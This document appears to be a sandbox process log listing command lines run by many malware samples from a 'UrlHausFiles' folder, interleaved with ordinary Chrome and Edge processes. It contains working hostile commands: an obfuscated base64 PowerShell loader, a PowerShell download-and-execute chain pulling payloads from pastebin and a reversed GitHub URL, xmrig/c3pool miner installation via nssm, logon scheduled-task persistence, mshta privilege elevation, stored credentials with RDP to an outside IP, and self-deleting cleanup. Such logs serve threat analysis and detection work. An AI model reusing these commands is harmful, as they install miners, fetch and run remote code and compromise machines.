C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"

C:\Users\Admin\c3pool\nssm.exe

"C:\Users\Admin\c3pool\nssm.exe" install c3pool_miner "C:\Users\Admin\c3pool\xmrig.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Opolis.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Opolis.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff913f5cc40,0x7ff913f5cc4c,0x7ff913f5cc58

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"

C:\Users\Admin\c3pool\nssm.exe

"C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppDirectory "C:\Users\Admin\c3pool"

C:\Users\Admin\Downloads\UrlHausFiles\cluton.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cluton.exe"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2308,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2304 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1680,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2340 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1848,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2504 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\cluton.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cluton.exe"

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\build.exe

"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat '23472\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",'} | Out-String; $out | Out-File -Encoding ASCII '23472\config.json'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3972,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3068 /prefetch:2

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4712,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:1

C:\Users\Admin\c3pool\nssm.exe

"C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS

C:\Users\Admin\Downloads\UrlHausFiles\chelentano.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chelentano.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\abc.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA93.tmp\AA94.tmp\AA95.bat C:\Users\Admin\Downloads\UrlHausFiles\9402.tmp.exe"

C:\Users\Admin\Downloads\UrlHausFiles\4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\4.exe"

C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe

"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat '23472\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"\",'} | Out-String; $out | Out-File -Encoding ASCII '23472\config.json'"

C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,12800595817030191335,15587349787253185,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B467.tmp\B468.tmp\B469.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Users\Admin\c3pool\nssm.exe

"C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppStdout "C:\Users\Admin\c3pool\stdout"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\cmdkey.exe

cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB755.tmp.bat""

C:\Users\Admin\Downloads\UrlHausFiles\win.exe

"C:\Users\Admin\Downloads\UrlHausFiles\win.exe"

C:\Windows\system32\mstsc.exe

mstsc /v: 211.168.94.177

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat '23472\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ozysbzxk\",'} | Out-String; $out | Out-File -Encoding ASCII '23472\config.json'"

C:\Users\Admin\c3pool\nssm.exe

"C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppStderr "C:\Users\Admin\c3pool\stderr"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'

C:\Users\Admin\Downloads\UrlHausFiles\wow.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\FCGIJDBAFCBA" & exit

C:\Windows\SysWOW64\route.exe

route print

C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat '23472\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII '23472\config.json'"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs"

C:\Users\Admin\Downloads\UrlHausFiles\Tinder%20Bot.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Tinder%20Bot.exe"

C:\Windows\SysWOW64\arp.exe

arp -a 10.127.0.1

C:\Users\Admin\c3pool\nssm.exe

"C:\Users\Admin\c3pool\nssm.exe" start c3pool_miner

C:\Users\Admin\Downloads\UrlHausFiles\hs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hs.exe"

C:\Users\Admin\c3pool\nssm.exe

C:\Users\Admin\c3pool\nssm.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bo☹G4☹a☹Bu☹HY☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹awBq☹GE☹dwBz☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹GE☹bwB1☹GY☹c☹☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹YQBv☹HU☹ZgBw☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBj☹G0☹cg☹x☹HY☹cw☹v☹G4☹aQBh☹G0☹LwBz☹GQ☹YQBl☹Gg☹LwBz☹GY☹ZQBy☹C8☹ZQBy☹Gk☹Zg☹v☹GE☹b☹Bs☹Gk☹dQBx☹G4☹YQBy☹HI☹YQBi☹DQ☹Mg☹w☹DI☹bgBv☹Gk☹c☹Bt☹GE☹a☹Bj☹C8☹bQBv☹GM☹LgB0☹G4☹ZQB0☹G4☹bwBj☹HI☹ZQBz☹HU☹YgB1☹Gg☹d☹Bp☹Gc☹LgB3☹GE☹cg☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Gs☹agBh☹Hc☹cw☹g☹Cw☹I☹☹n☹Hc☹aQBu☹DY☹N☹Bi☹Gk☹d☹☹n☹Cw☹I☹☹k☹Gg☹bgBo☹G4☹dg☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹Ds☹';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs');powershell $Yolopolhggobek;

C:\Users\Admin\c3pool\xmrig.exe

"C:\Users\Admin\c3pool\xmrig.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat '23472\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"23472\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII '23472\config.json'"

C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20AH.NET.exe

"C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20AH.NET.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CBA8.tmp\CBA9.tmp\CBAA.bat C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"

C:\Users\Admin\AppData\Roaming\http.exe

"C:\Users\Admin\AppData\Roaming\http.exe"

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\AppData\Roaming\icsys.ico.exe

C:\Users\Admin\AppData\Roaming\icsys.ico.exe

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fb613cb8,0x7ff8fb613cc8,0x7ff8fb613cd8

C:\Windows\system32\net.exe

net use /delete * /y

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5856 -ip 5856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hnhnv = '0' ;$kjaws = 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs' ;[Byte[]] $aoufp = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($aoufp).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('cmr1vs/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $kjaws , 'win64bit', $hnhnv, '1', 'Roda' ));"

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1148

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D174.tmp\D175.tmp\D176.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E0

C:\Users\Admin\Downloads\UrlHausFiles\notmyfault.exe

"C:\Users\Admin\Downloads\UrlHausFiles\notmyfault.exe"

C:\Windows\system32\net.exe

net use D: \\210.216.165.152\super_share smbtest@@ /user:smbtest /persistent:yes

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

"23472\nssm.exe" install c3pool_miner_59 "23472\xmrig.exe"

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 /prefetch:3

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6932 -ip 6932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2472 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\NG1.bat" "

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD8A.tmp\DD8B.tmp\DD8C.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe

"C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\vpn.exe

"C:\Users\Admin\Downloads\UrlHausFiles\vpn.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

